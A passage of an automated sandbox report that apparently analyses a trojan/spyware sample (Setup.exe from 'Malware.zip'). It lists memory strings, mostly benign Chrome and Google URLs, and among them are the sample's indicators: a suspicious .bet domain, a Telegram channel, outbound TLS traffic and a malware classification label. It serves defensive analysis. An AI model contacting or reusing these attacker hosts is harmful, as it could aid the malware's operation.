        Source: chrome.exe, 0000000D.00000002.2594117821.0000691400F4C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581929231.0000691400A5C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2588822168.0000691400D28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
        Source: chrome.exe, 0000000D.00000002.2588822168.0000691400D28000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599149994.0000691401178000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
        Source: chrome.exe, 0000000D.00000003.1885841225.0000691000540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
        Source: chrome.exe, 0000000D.00000002.2594117821.0000691400F4C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581929231.0000691400A5C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2588822168.0000691400D28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
        Source: chrome.exe, 0000000D.00000002.2587337302.0000691400C9C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900834316.000069140129D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
        Source: chrome.exe, 0000000D.00000002.2566175437.00006914002AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
        Source: chrome.exe, 0000000D.00000003.1968009878.0000691401DEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
        Source: chrome.exe, 0000000D.00000002.2543861158.000001B00DD5D000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://ogs.google.com
        Source: chrome.exe, 0000000D.00000003.1968009878.0000691401DEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
        Source: chrome.exe, 0000000D.00000003.1968009878.0000691401DEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
        Source: chrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.goog
        Source: chrome.exe, 0000000D.00000002.2602828622.00006914012FC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2608382175.0000691401554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606155656.0000691401478000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606034082.000069140146C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
        Source: chrome.exe, 0000000D.00000002.2597706000.00006914010DC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2608382175.0000691401554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606155656.0000691401478000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606034082.000069140146C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
        Source: chrome.exe, 0000000D.00000002.2596977075.0000691401077000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
        Source: chrome.exe, 0000000D.00000002.2610358625.00006914016C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2608382175.0000691401554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2619869759.000069140203C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606155656.0000691401478000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606034082.000069140146C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1728324084&target=OPTIMIZATION_TARGET_OMN
        Source: chrome.exe, 0000000D.00000002.2599701490.00006914011AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2618913828.0000691401EA4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2615841334.00006914019C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606282247.0000691401484000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2616586165.0000691401B55000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587337302.0000691400C9C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606155656.0000691401478000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606034082.000069140146C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739808228&target=OPTIMIZATION_TARGET_GEO
        Source: chrome.exe, 0000000D.00000002.2610358625.00006914016C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2608382175.0000691401554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606155656.0000691401478000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2569348114.00006914003E8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606034082.000069140146C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2600559851.0000691401204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739808249&target=OPTIMIZATION_TARGET_NOT
        Source: chrome.exe, 0000000D.00000002.2613155763.00006914018AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1739894676&target=OPTIMIZATION_TARGET_CLI
        Source: chrome.exe, 0000000D.00000002.2600559851.0000691401204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587903834.0000691400CD4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1901059821.00006914013D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042075&target=OPTIMIZATION_TARGET_S
        Source: chrome.exe, 0000000D.00000002.2615841334.00006914019C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606407071.0000691401490000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2608382175.0000691401554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606155656.0000691401478000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2571198790.0000691400511000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606034082.000069140146C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2564629666.000069140016D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2609043427.00006914015B0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2606665316.00006914014AD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
        Source: chrome.exe, 0000000D.00000002.2592245861.0000691400E98000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetModels?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
        Source: chrome.exe, 0000000D.00000003.1932288737.0000691400605000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1929526429.0000691401604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/calendar/
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://passwords.google.comSaved
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://passwords.google/
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://people.googleapis.com/
        Source: chromecache_69.14.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
        Source: chrome.exe, 0000000D.00000002.2543861158.000001B00DD57000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/log?format=json&hasfast=truesyncdata.v1.AsyncDataService/GetAsyncData
        Source: chromecache_67.14.drString found in binary or memory: https://plus.google.com
        Source: chromecache_67.14.drString found in binary or memory: https://plus.googleapis.com
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmp, chrome.exe, 0000000D.00000003.1900834316.0000691401298000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587337302.0000691400C9C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1900834316.000069140129D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
        Source: chrome.exe, 0000000D.00000002.2576680130.000069140083C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
        Source: chrome.exe, 0000000D.00000002.2576680130.000069140083C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
        Source: Setup.exe, 0000000A.00000003.1867447694.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1867447694.00000000013DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://restfulzpillow.bet/
        Source: Setup.exe, 0000000A.00000003.1867447694.0000000001402000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1867447694.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1867447694.00000000013EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://restfulzpillow.bet/bWij
        Source: Setup.exe, 0000000A.00000003.1867447694.0000000001402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://restfulzpillow.bet/bWijt
        Source: chrome.exe, 0000000D.00000002.2569784819.0000691400444000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
        Source: chrome.exe, 0000000D.00000002.2564257407.0000691400138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
        Source: chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
        Source: chrome.exe, 0000000D.00000003.1886045999.000069100055C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com
        Source: chrome.exe, 0000000D.00000003.1886045999.000069100055C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comAffiliationsGroupInfoEnabledAutofillEnableEmailHeuristicOutside
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
        Source: chrome.exe, 0000000D.00000002.2590248453.0000691400DB4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2587041056.0000691400C6C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2611075318.0000691401750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.2570779675.00006914004D4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://support.google.com/chrome/a/?p=browser_profile_details
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://support.google.com/chrome/answer/96817
        Source: chrome.exe, 0000000D.00000003.1930976582.0000691400590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://support.google.com/chromebook?p=app_intent
        Source: Setup.exe, 0000000A.00000003.1828376706.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1867447694.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1828579447.00000000013BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
        Source: Setup.exe, 0000000A.00000003.1828339340.0000000003C6C000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000A.00000003.1828376706.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000A.00000002.2479621096.0000000000FB2000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://t.me/owowoowokk3j4
        Source: Setup.exe, 0000000A.00000002.2479621096.0000000000FB2000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://t.me/owowoowokk3j4L;iw
        Source: chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
        Source: Setup.exe, 0000000A.00000003.1828339340.0000000003C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
        Source: Setup.exe, 0000000A.00000003.1828339340.0000000003C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=35aef6c15fabadbfda_468827385733
        Source: Setup.exe, 0000000A.00000003.1828339340.0000000003C6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
        Source: Louserzation.jsonString found in binary or memory: https://whatif.one/
        Source: chromecache_67.14.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
        Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20x
        Source: chrome.exe, 0000000D.00000002.2613801960.0000691401900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: chrome.exe, 0000000D.00000003.1900763625.0000691401288000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2610261143.00006914016C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
        Source: chrome.exe, 0000000D.00000002.2608382175.0000691401554000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
        Source: chrome.exe, 0000000D.00000002.2613155763.00006914018AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/#safe
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-features/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-tools/
        Source: chrome.exe, 0000000D.00000003.1934016786.0000691401A7E000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
        Source: chrome.exe, 0000000D.00000002.2515920616.000001B007E20000.00000002.00000001.00040000.00000012.sdmpString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged
        Source: chrome.exe, 0000000D.00000002.2586377952.0000691400C2C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2599701490.00006914011AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2589255460.0000691400D54000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
        Source: Setup.exe, 0000000A.00000003.1871147523.0000000003CCB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573256595.00006914006DC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2573086133.000069140066C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591638099.0000691400E5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
        Source: chrome.exe, 0000000D.00000002.2570779675.00006914004D4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
        Source: chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
        Source: chrome.exe, 0000000D.00000003.1934016786.0000691401A7E000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
        Source: chrome.exe, 0000000D.00000002.2569784819.0000691400444000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
        Source: chrome.exe, 0000000D.00000002.2569784819.0000691400444000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit99
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
        Source: chromecache_67.14.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
        Source: chromecache_67.14.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
        Source: chrome.exe, 0000000D.00000003.1885841225.0000691000540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
        Source: chrome.exe, 0000000D.00000003.1884668031.0000691000404000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1934181990.0000691401AF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
        Source: chrome.exe, 0000000D.00000003.1885841225.0000691000540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerForcedOn_PlusAddressAndroidOpenGmsCoreManagementP
        Source: chrome.exe, 0000000D.00000003.1885841225.0000691000540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerPlusAddressOfferCreationIfPasswordFieldIsNotVisib
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
        Source: chrome.exe, 0000000D.00000002.2566175437.0000691400204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
        Source: chrome.exe, 0000000D.00000002.2613801960.0000691401900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: chrome.exe, 0000000D.00000002.2613801960.0000691401900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: chrome.exe, 0000000D.00000002.2577717429.00006914008A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2562777272.0000691400098000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
        Source: chromecache_69.14.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
        Source: chromecache_69.14.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
        Source: chromecache_69.14.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
        Source: chrome.exe, 0000000D.00000003.1967863200.0000691401D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
        Source: chrome.exe, 0000000D.00000003.2199550942.0000691401E86000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1967863200.0000691401D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
        Source: chrome.exe, 0000000D.00000002.2597469697.00006914010C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2565055950.0000691400190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.WcyoQrvsWY0.2019.O/rt=j/m=q_dnp
        Source: chrome.exe, 0000000D.00000003.1968009878.0000691401DEC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1968925511.0000691401653000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.L8bgMGq1rcI.L.W.O/m=qmd
        Source: chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2591961219.0000691400E7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
        Source: chrome.exe, 0000000D.00000002.2596977075.0000691401070000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2580424614.00006914009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2607546412.0000691401500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
        Source: chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
        Source: chrome.exe, 0000000D.00000002.2612827514.0000691401890000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2581385360.0000691400A3F000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2596792163.0000691401060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.16:49701 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.11.150:443 -> 192.168.2.16:49703 version: TLS 1.2
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeProcess Stats: CPU usage > 24%
        Source: classification engineClassification label: mal76.troj.spyw.evad.winZIP@38/14@11/5
        Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
        Source: C:\Windows\System32\OpenWith.exeFile read: C:\Users\desktop.ini
        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: chrome.exe, 0000000D.00000002.2583933200.0000691400B24000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
        Source: chrome.exe, 0000000D.00000002.2595428536.0000691400FC8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
